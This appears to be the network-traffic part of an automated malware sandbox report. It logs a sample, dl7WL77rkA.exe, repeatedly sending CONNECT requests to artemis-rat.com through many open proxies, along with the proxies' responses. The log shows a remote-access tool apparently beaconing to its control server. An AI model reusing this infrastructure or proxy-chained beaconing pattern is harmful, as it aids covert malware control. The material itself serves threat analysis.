                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:48.187269926 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:48.843167067 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:49.757435083 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:51.583209038 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:55.239094019 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:02.551028967 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:17.176285028 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:46.455214977 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1259192.168.2.55340323.137.248.19788883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.012263060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.307588100 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1260192.168.2.552895153.139.233.21880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.012689114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.781260014 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1261192.168.2.552827192.163.200.80373273876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.012697935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.014522076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1262192.168.2.552760187.49.191.739993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.013238907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.046597004 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1263192.168.2.553358203.95.196.5080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.019351006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1264192.168.2.55280645.10.42.2031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.020407915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.201941967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.208198071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.405117035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1265192.168.2.553465172.64.80.55803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.023361921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.178081989 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1266192.168.2.55337814.232.235.1380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.024480104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.422102928 CET72INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1267192.168.2.55345338.54.101.25490003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.028495073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.205440044 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1268192.168.2.553061117.160.250.16388283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.063868046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.005883932 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.863737106 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1269192.168.2.553463192.210.228.28156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.065331936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1270192.168.2.55344768.183.143.134803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.071983099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.885030985 CET814INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 622
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 63 6f 70 70 65 72 61 6c 6c 69 61 6e 63 65 2e 75 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@copperalliance.us to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1271192.168.2.55346038.162.3.8231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.076589108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.495726109 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1272192.168.2.553412195.87.217.7533893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.095287085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1273192.168.2.552836104.251.212.206590573876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.099772930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.201941967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.208221912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.405129910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1274192.168.2.552769115.244.127.164803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.123959064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1275192.168.2.553414171.247.244.10310803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.128776073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1276192.168.2.553421200.10.73.21056783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.133032084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1277192.168.2.553416143.64.8.2180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.144150019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.680324078 CET59INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1278192.168.2.552568117.160.250.138803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.203222990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.266588926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405419111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.462956905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.390310049 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
